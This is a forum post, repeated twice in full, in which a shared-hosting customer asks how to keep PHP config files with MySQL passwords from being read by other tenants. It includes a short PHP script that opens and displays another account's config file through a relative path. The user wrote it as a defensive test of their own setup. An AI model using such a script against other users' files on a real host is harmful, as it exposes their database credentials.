haaglin
November 18th, 2006, 12:39 PM
Hi.
Not sure if this is a programming issue or server issue, but
i'm looking for a good way of protecting my config files that contains mysql passwords from being read by other customers on the same host as i use. As a test i made a config file, and uploaded it on my user. And i used another account to upload a script to read the file.
To explain further, here is an example:
www.domain1.com:
Code:
root: /var/www/web1/web/
file: /var/www/web1/web/config/constants.php
constants.php:
<?
define("MYSQL_PASS","123456789");
?>
www.domain2.com:
root: /var/www/web2/web/
file: /var/www/web2/web/test.php
test.php:
<?php
$filename = realpath("../../web1/web/config/constants.php");
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
echo '<textarea name="textareaName" rows="46" cols="103">'.$contents.'</textarea>';
?>
And i was able to read the file? Is this a host security issue? or can i do something to prevent reading?
I tried to deny world read access, but then apache didn't have access to it. This is a huge security issue for me.
Not sure if this is a programming issue or server issue, but
i'm looking for a good way of protecting my config files that contains mysql passwords from being read by other customers on the same host as i use. As a test i made a config file, and uploaded it on my user. And i used another account to upload a script to read the file.
To explain further, here is an example:
www.domain1.com:
Code:
root: /var/www/web1/web/
file: /var/www/web1/web/config/constants.php
constants.php:
<?
define("MYSQL_PASS","123456789");
?>
www.domain2.com:
root: /var/www/web2/web/
file: /var/www/web2/web/test.php
test.php:
<?php
$filename = realpath("../../web1/web/config/constants.php");
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
echo '<textarea name="textareaName" rows="46" cols="103">'.$contents.'</textarea>';
?>
And i was able to read the file? Is this a host security issue? or can i do something to prevent reading?
I tried to deny world read access, but then apache didn't have access to it. This is a huge security issue for me.